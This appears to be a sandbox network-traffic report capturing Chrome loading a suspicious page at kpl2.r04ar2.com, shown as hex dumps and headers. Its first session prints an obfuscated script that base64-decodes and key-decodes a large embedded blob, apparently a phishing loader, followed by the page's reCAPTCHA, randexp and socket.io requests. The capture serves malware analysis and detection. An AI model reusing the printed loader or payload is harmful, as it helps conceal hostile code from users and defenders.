                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1k
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 34 65 31 33 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 62 5a 64 76 47 75 49 44 71 4e 28 74 72 53 56 58 68 46 6b 59 4d 2c 20 49 55 58 46 58 77 6a 6e 59 77 29 20 7b 0d 0a 6c 65 74 20 61 4e 54 48 61 49 70 57 4e 78 20 3d 20 27 27 3b 0d 0a 74 72 53 56 58 68 46 6b 59 4d 20 3d 20 61 74 6f 62 28 74 72 53 56 58 68 46 6b 59 4d 29 3b 0d 0a 6c 65 74 20 42 6f 41 55 51 4c 4d 4d 6c 5a 20 3d 20 49 55 58 46 58 77 6a 6e 59 77 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 53 56 58 68 46 6b 59 4d 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 61 4e 54 48 61 49 70 57 4e 78 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 74 72 53 56 58 68 46 6b 59 4d 2e 63 68 61 72 43
                                                          Data Ascii: 4e13<script>function bZdvGuIDqN(trSVXhFkYM, IUXFXwjnYw) {let aNTHaIpWNx = '';trSVXhFkYM = atob(trSVXhFkYM);let BoAUQLMMlZ = IUXFXwjnYw.length;for (let i = 0; i < trSVXhFkYM.length; i++) { aNTHaIpWNx += String.fromCharCode(trSVXhFkYM.charC
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 53 50 42 4d 70 4d 51 70 58 44 6a 6b 6f 52 6d 63 64 4e 6a 4a 52 56 30 67 31 4e 46 30 37 47 54 59 6d 58 68 49 42 4f 48 73 51 4b 51 51 32 4f 6b 34 59 42 79 4d 31 45 48 5a 6e 55 33 51 58 56 55 68 71 4b 6c 73 6d 41 58 6b 6d 55 68 6c 56 64 44 5a 41 4c 51 59 32 4e 56 4e 58 53 44 34 30 56 79 35 58 65 32 30 48 4e 79 51 75 45 47 6f 67 47 67 73 41 63 30 46 64 4e 58 64 78 50 68 6b 74 59 51 52 58 53 44 63 31 44 32 6f 4d 4e 6a 70 44 56 30 67 69 50 30 49 74 56 33 73 79 57 42 73 63 65 54 46 64 4c 67 78 72 64 68 63 57 47 6a 6b 31 51 53 63 59 4d 44 4e 65 47 31 56 30 4a 31 77 6e 42 43 41 35 57 41 41 62 64 48 67 2f 51 6b 70 35 64 42 64 4a 42 44 38 6f 57 57 67 59 50 44 67 4b 56 78 67 6b 49 31 34 6e 43 7a 31 32 46 78 30 61 4d 79 41 50 61 6c 35 73 4f 48 74 43 49 7a 38 32 66 77
                                                          Data Ascii: SPBMpMQpXDjkoRmcdNjJRV0g1NF07GTYmXhIBOHsQKQQ2Ok4YByM1EHZnU3QXVUhqKlsmAXkmUhlVdDZALQY2NVNXSD40Vy5Xe20HNyQuEGogGgsAc0FdNXdxPhktYQRXSDc1D2oMNjpDV0giP0ItV3syWBsceTFdLgxrdhcWGjk1QScYMDNeG1V0J1wnBCA5WAAbdHg/Qkp5dBdJBD8oWWgYPDgKVxgkI14nCz12Fx0aMyAPal5sOHtCIz82fw
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 44 54 63 79 43 55 56 67 65 58 51 58 56 55 68 32 5a 68 4a 6f 53 6e 6c 30 56 52 51 4c 50 53 46 41 4a 78 38 33 4d 42 6f 46 42 79 55 76 52 69 45 46 4e 32 34 58 46 67 30 34 4d 6c 63 36 53 6a 6f 78 57 51 45 4e 4a 47 70 52 4c 51 51 74 4d 55 56 56 43 7a 4d 6f 52 69 30 59 59 6c 6b 39 56 55 68 32 5a 68 4a 6f 53 6e 6c 30 46 31 56 49 4e 43 64 52 49 77 30 72 4f 30 49 62 44 48 73 31 57 7a 49 50 59 33 52 55 47 68 34 7a 4e 42 34 72 42 53 38 78 52 55 35 6c 58 47 59 53 61 45 70 35 64 42 64 56 53 48 5a 6d 45 69 73 46 4e 54 74 46 54 30 68 31 64 31 42 35 43 47 67 32 44 48 68 69 64 6d 59 53 61 45 70 35 64 42 63 49 5a 56 78 4c 4f 43 45 45 4b 53 46 44 54 30 55 68 49 31 41 6a 41 79 31 35 56 67 41 63 4f 53 42 62 4a 41 5a 31 57 54 30 63 42 69 59 7a 52 6e 4a 48 4c 6a 46 56 48 67 45
                                                          Data Ascii: DTcyCUVgeXQXVUh2ZhJoSnl0VRQLPSFAJx83MBoFByUvRiEFN24XFg04Mlc6SjoxWQENJGpRLQQtMUVVCzMoRi0YYlk9VUh2ZhJoSnl0F1VINCdRIw0rO0IbDHs1WzIPY3RUGh4zNB4rBS8xRU5lXGYSaEp5dBdVSHZmEisFNTtFT0h1d1B5CGg2DHhidmYSaEp5dBcIZVxLOCEEKSFDT0UhI1AjAy15VgAcOSBbJAZ1WT0cBiYzRnJHLjFVHgE
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 43 5a 53 42 51 30 33 4d 67 6c 46 59 48 6c 30 46 31 56 49 64 6d 59 53 4e 57 64 54 64 42 64 56 53 48 5a 6d 45 6d 68 45 4f 7a 56 5a 47 77 30 6b 4b 6c 30 76 42 53 4a 5a 50 56 56 49 64 6d 59 53 61 45 70 35 64 42 64 56 53 44 34 6a 57 79 38 43 4c 57 34 58 52 31 77 6d 50 67 6c 46 59 48 6c 30 46 31 56 49 64 6d 59 53 61 45 70 35 64 46 6f 55 45 48 73 75 56 79 45 4e 4d 53 41 4e 56 56 74 67 4e 6b 70 7a 5a 31 4e 30 46 31 56 49 64 6d 59 53 61 45 70 35 64 42 63 58 43 54 55 74 56 54 6f 46 4c 44 70 54 57 41 45 37 4a 31 55 74 55 48 6b 68 52 52 6c 41 64 47 6c 62 49 67 51 39 62 45 51 53 58 67 63 6a 53 42 30 66 41 47 78 35 48 68 38 58 46 30 70 2b 4a 79 38 31 42 53 41 5a 50 78 46 37 47 68 38 53 50 55 4d 59 41 44 51 75 59 6a 34 38 61 54 42 67 54 56 46 6a 64 58 73 70 45 6a 63 62
                                                          Data Ascii: CZSBQ03MglFYHl0F1VIdmYSNWdTdBdVSHZmEmhEOzVZGw0kKl0vBSJZPVVIdmYSaEp5dBdVSD4jWy8CLW4XR1wmPglFYHl0F1VIdmYSaEp5dFoUEHsuVyENMSANVVtgNkpzZ1N0F1VIdmYSaEp5dBcXCTUtVToFLDpTWAE7J1UtUHkhRRlAdGlbIgQ9bEQSXgcjSB0fAGx5Hh8XF0p+Jy81BSAZPxF7Gh8SPUMYADQuYj48aTBgTVFjdXspEjcb
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 77 46 4f 77 6b 74 54 55 4a 62 66 32 5a 55 4a 78 67 30 4e 55 4e 64 54 79 45 70 56 43 35 59 64 43 4a 57 42 77 45 33 4d 6c 73 6e 42 43 70 7a 48 6b 35 6c 58 47 59 53 61 45 6f 73 4f 6c 34 57 42 7a 49 6a 48 7a 6f 4c 4e 7a 4e 53 54 30 67 44 62 51 4a 6c 57 32 6b 53 63 54 4d 75 62 55 73 34 61 45 70 35 64 46 45 61 42 69 4a 72 56 69 45 5a 4b 54 68 57 44 46 4a 32 4e 55 55 70 47 6c 52 65 46 31 56 49 64 6a 73 2f 51 6b 70 35 64 42 64 34 59 6e 5a 6d 45 6d 67 71 50 7a 74 5a 41 55 55 77 4a 31 45 74 53 69 4a 5a 50 56 56 49 64 6d 5a 55 4a 77 51 74 65 56 45 55 42 54 38 71 53 33 4a 4b 66 6a 4e 54 42 67 41 7a 4e 45 49 70 54 57 4a 5a 50 56 56 49 64 6d 5a 55 4a 77 51 74 65 55 41 51 41 54 45 75 52 6e 4a 4b 61 48 51 4f 52 56 68 74 53 7a 68 6f 53 6e 6c 30 52 41 63 4c 62 47 5a 48 4f
                                                          Data Ascii: wFOwktTUJbf2ZUJxg0NUNdTyEpVC5YdCJWBwE3MlsnBCpzHk5lXGYSaEosOl4WBzIjHzoLNzNST0gDbQJlW2kScTMubUs4aEp5dFEaBiJrViEZKThWDFJ2NUUpGlReF1VIdjs/Qkp5dBd4YnZmEmgqPztZAUUwJ1EtSiJZPVVIdmZUJwQteVEUBT8qS3JKfjNTBgAzNEIpTWJZPVVIdmZUJwQteUAQATEuRnJKaHQORVhtSzhoSnl0RAcLbGZHO
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 45 4e 7a 56 42 64 55 67 39 4f 30 4e 59 44 6a 6f 70 55 7a 77 44 4e 7a 4d 56 53 31 52 35 49 6c 73 2b 56 46 52 65 46 31 56 49 64 6d 59 53 61 45 70 35 64 42 64 56 53 48 5a 6d 45 6e 51 4f 4d 43 49 58 46 67 51 33 4e 55 46 31 53 44 30 37 51 31 67 4f 4f 69 6c 54 50 41 4d 33 4d 78 56 4c 56 48 6b 69 57 7a 35 55 56 46 34 4c 56 45 56 37 5a 6d 45 39 43 54 6f 78 52 41 5a 49 50 7a 55 53 4a 67 55 74 64 46 34 62 53 43 45 75 55 7a 78 4b 49 44 74 43 56 51 41 33 4d 46 64 6b 53 6a 73 68 51 31 55 66 50 69 6b 53 4d 51 55 73 64 46 59 48 44 58 68 6d 48 32 56 55 55 33 51 58 56 55 68 32 5a 68 4a 6f 53 6e 6c 30 46 31 56 49 64 6d 59 4f 4c 41 4d 76 64 46 51 5a 43 53 55 31 44 32 6f 4f 4e 69 41 61 45 77 51 35 4a 30 59 68 42 44 35 32 43 55 6c 48 4d 69 39 45 64 6d 64 54 64 42 64 56 53 48
                                                          Data Ascii: ENzVBdUg9O0NYDjopUzwDNzMVS1R5Ils+VFReF1VIdmYSaEp5dBdVSHZmEnQOMCIXFgQ3NUF1SD07Q1gOOilTPAM3MxVLVHkiWz5UVF4LVEV7ZmE9CToxRAZIPzUSJgUtdF4bSCEuUzxKIDtCVQA3MFdkSjshQ1UfPikSMQUsdFYHDXhmH2VUU3QXVUh2ZhJoSnl0F1VIdmYOLAMvdFQZCSU1D2oONiAaEwQ5J0YhBD52CUlHMi9EdmdTdBdVSH
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 61 42 67 52 41 53 42 34 50 30 4a 4b 65 58 51 58 53 55 63 6c 49 31 45 38 41 7a 59 36 43 58 68 69 61 6d 63 66 5a 55 6f 4e 50 46 4a 56 42 7a 67 71 53 32 67 47 4d 44 6c 65 41 55 67 69 4b 52 49 6e 48 79 74 30 52 52 41 4a 4f 69 39 49 4b 52 34 77 4f 31 6c 56 42 7a 42 6d 52 69 63 48 4e 69 5a 46 47 68 39 32 4d 56 73 6b 42 6e 6b 32 55 6c 55 48 49 7a 51 53 4c 41 55 73 4e 6b 4d 47 53 44 6b 67 45 6a 77 46 50 54 56 4f 57 30 68 37 61 77 78 43 5a 31 4e 30 46 31 56 49 61 6a 56 58 4b 78 34 77 4f 31 6c 56 41 54 4a 37 45 44 73 50 4f 69 42 65 47 67 59 4a 4d 31 77 70 42 7a 78 32 46 78 59 45 4e 7a 56 42 64 55 67 39 65 56 6b 61 42 6a 4e 6b 44 45 56 67 65 58 51 58 56 55 68 32 5a 68 4a 46 59 47 56 31 47 6c 68 49 42 54 4e 52 4b 77 38 71 4a 78 63 63 42 6e 59 6b 52 7a 73 44 4e 7a 46
                                                          Data Ascii: aBgRASB4P0JKeXQXSUclI1E8AzY6CXhiamcfZUoNPFJVBzgqS2gGMDleAUgiKRInHyt0RRAJOi9IKR4wO1lVBzBmRicHNiZFGh92MVskBnk2UlUHIzQSLAUsNkMGSDkgEjwFPTVOW0h7awxCZ1N0F1VIajVXKx4wO1lVATJ7EDsPOiBeGgYJM1wpBzx2FxYENzVBdUg9eVkaBjNkDEVgeXQXVUh2ZhJFYGV1GlhIBTNRKw8qJxccBnYkRzsDNzF
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 6a 34 6d 61 78 42 43 4d 31 74 6c 63 67 4e 36 57 48 74 37 43 58 68 69 64 6d 59 53 61 45 70 35 64 42 64 56 53 48 5a 6d 44 6d 63 49 4c 43 42 44 47 67 5a 6f 53 7a 68 30 53 33 52 35 46 30 6b 4d 50 7a 41 4d 44 41 55 33 63 68 52 46 57 32 39 39 52 6d 67 64 4f 43 42 55 48 55 67 69 4c 6c 64 6f 43 54 55 37 56 42 35 54 64 69 4a 64 61 42 30 78 4e 55 4e 56 41 53 4a 6d 56 69 63 50 4b 6e 6f 58 50 67 30 7a 4e 68 49 76 42 54 41 36 55 46 74 55 65 53 4a 62 50 6c 52 35 65 52 70 4c 59 6e 5a 6d 45 6d 68 4b 65 58 51 58 56 55 68 32 5a 67 34 67 57 48 6b 33 57 78 51 62 4a 58 73 51 50 41 4d 74 4f 46 4a 56 42 54 52 72 41 33 35 4b 4e 43 41 61 52 46 35 30 65 47 45 68 44 54 64 30 58 68 74 55 65 53 34 41 64 6d 64 54 64 42 64 56 53 48 5a 6d 45 6d 68 4b 65 58 51 58 56 55 68 32 5a 67 34 73
                                                          Data Ascii: j4maxBCM1tlcgN6WHt7CXhidmYSaEp5dBdVSHZmDmcILCBDGgZoSzh0S3R5F0kMPzAMDAU3chRFW299RmgdOCBUHUgiLldoCTU7VB5TdiJdaB0xNUNVASJmVicPKnoXPg0zNhIvBTA6UFtUeSJbPlR5eRpLYnZmEmhKeXQXVUh2Zg4gWHk3WxQbJXsQPAMtOFJVBTRrA35KNCAaRF50eGEhDTd0XhtUeS4AdmdTdBdVSHZmEmhKeXQXVUh2Zg4s
                                                          2024-08-27 22:11:06 UTC1369INData Raw: 4d 2f 4b 46 56 6f 43 7a 63 74 46 77 63 42 4a 53 30 63 64 45 55 39 50 55 46 4c 53 48 74 72 44 45 4a 4b 65 58 51 58 56 55 68 32 5a 67 35 6e 44 6a 41 69 43 58 68 69 61 6d 63 66 5a 55 70 6c 4d 46 34 44 56 68 67 6a 52 43 30 59 65 54 4e 65 41 77 31 32 4c 31 78 6f 44 79 45 33 55 67 55 63 64 6a 4a 64 61 41 6b 32 4f 6b 45 63 43 79 49 76 58 53 59 5a 65 54 74 52 56 51 41 35 4b 46 30 36 53 6a 67 36 55 31 55 50 4f 53 6c 57 61 42 6b 38 4f 6b 51 51 52 6d 70 70 56 69 45 63 5a 33 51 61 57 46 5a 63 5a 68 4a 6f 53 6e 6c 30 46 31 56 49 64 6d 59 4f 4c 41 4d 76 64 46 51 5a 43 53 55 31 44 32 6f 46 4b 53 42 45 56 31 5a 62 54 42 4a 6f 53 6e 6c 30 46 31 56 49 64 6d 59 53 61 46 59 70 64 46 51 5a 43 53 55 31 44 32 6f 43 4f 43 63 61 48 41 73 35 4b 42 49 6c 43 48 52 6b 46 56 55 62 49
                                                          Data Ascii: M/KFVoCzctFwcBJS0cdEU9PUFLSHtrDEJKeXQXVUh2Zg5nDjAiCXhiamcfZUplMF4DVhgjRC0YeTNeAw12L1xoDyE3UgUcdjJdaAk2OkEcCyIvXSYZeTtRVQA5KF06Sjg6U1UPOSlWaBk8OkQQRmppViEcZ3QaWFZcZhJoSnl0F1VIdmYOLAMvdFQZCSU1D2oFKSBEV1ZbTBJoSnl0F1VIdmYSaFYpdFQZCSU1D2oCOCcaHAs5KBIlCHRkFVUbI


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.44979535.190.80.14431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:06 UTC480OUTPOST /report/v4?s=M%2B3Hwfm5URa0VIteODWMU8DrfSEvhq2TVdS8YuOi20LAechWtbpiyhuqmicuzV2Bgmk6g52Ft91M1q3K0Ga0TX76s19zPo9ucrgRAgL%2FcN5%2BeBG%2F84dvq1celzyB%2Bw%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 413
                                                          Content-Type: application/reports+json
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:06 UTC413OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 35 37 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 70 6c 32 2e 72 30 34 61 72 32 2e 63 6f 6d 2f
                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":1578,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://kpl2.r04ar2.com/
                                                          2024-08-27 22:11:06 UTC168INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          date: Tue, 27 Aug 2024 22:11:05 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.449803142.250.185.1644431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC626OUTGET /recaptcha/api.js HTTP/1.1
                                                          Host: www.google.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:07 UTC749INHTTP/1.1 200 OK
                                                          Content-Type: text/javascript; charset=utf-8
                                                          Expires: Tue, 27 Aug 2024 22:11:07 GMT
                                                          Date: Tue, 27 Aug 2024 22:11:07 GMT
                                                          Cache-Control: private, max-age=300
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                          Server: ESF
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2024-08-27 22:11:07 UTC641INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                          Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                          2024-08-27 22:11:07 UTC800INData Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e
                                                          Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
                                                          2024-08-27 22:11:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.449804140.82.121.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC564OUTGET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1
                                                          Host: github.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:07 UTC995INHTTP/1.1 302 Found
                                                          Server: GitHub.com
                                                          Date: Tue, 27 Aug 2024 22:11:07 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                          Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240827T221107Z&X-Amz-Expires=300&X-Amz-Signature=af9a21034bb5e7fe65ef996d782a724b97119aa5e47467ec39a4e165ad0b1acb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                          Cache-Control: no-cache
                                                          Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                          X-Frame-Options: deny
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 0
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          2024-08-27 22:11:07 UTC3261INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                          Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.44979913.227.219.404431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC534OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                          Host: cdn.socket.io
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:07 UTC700INHTTP/1.1 200 OK
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Length: 45806
                                                          Connection: close
                                                          Accept-Ranges: bytes
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: public, max-age=31536000, immutable
                                                          Content-Disposition: inline; filename="socket.io.min.js"
                                                          Date: Mon, 26 Aug 2024 19:07:13 GMT
                                                          ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                          Server: Vercel
                                                          Strict-Transport-Security: max-age=63072000
                                                          X-Vercel-Cache: HIT
                                                          X-Vercel-Id: fra1::55d8j-1724699233463-480a2c05c809
                                                          X-Cache: Hit from cloudfront
                                                          Via: 1.1 6e44e48abc671a9155ea845c36f68920.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: AMS54-C1
                                                          X-Amz-Cf-Id: dlvZ34iIqv07kxeexaZCuzqIicR1ubi78OlZXnYHJqGwKlQJsQ9JxQ==
                                                          Age: 97434
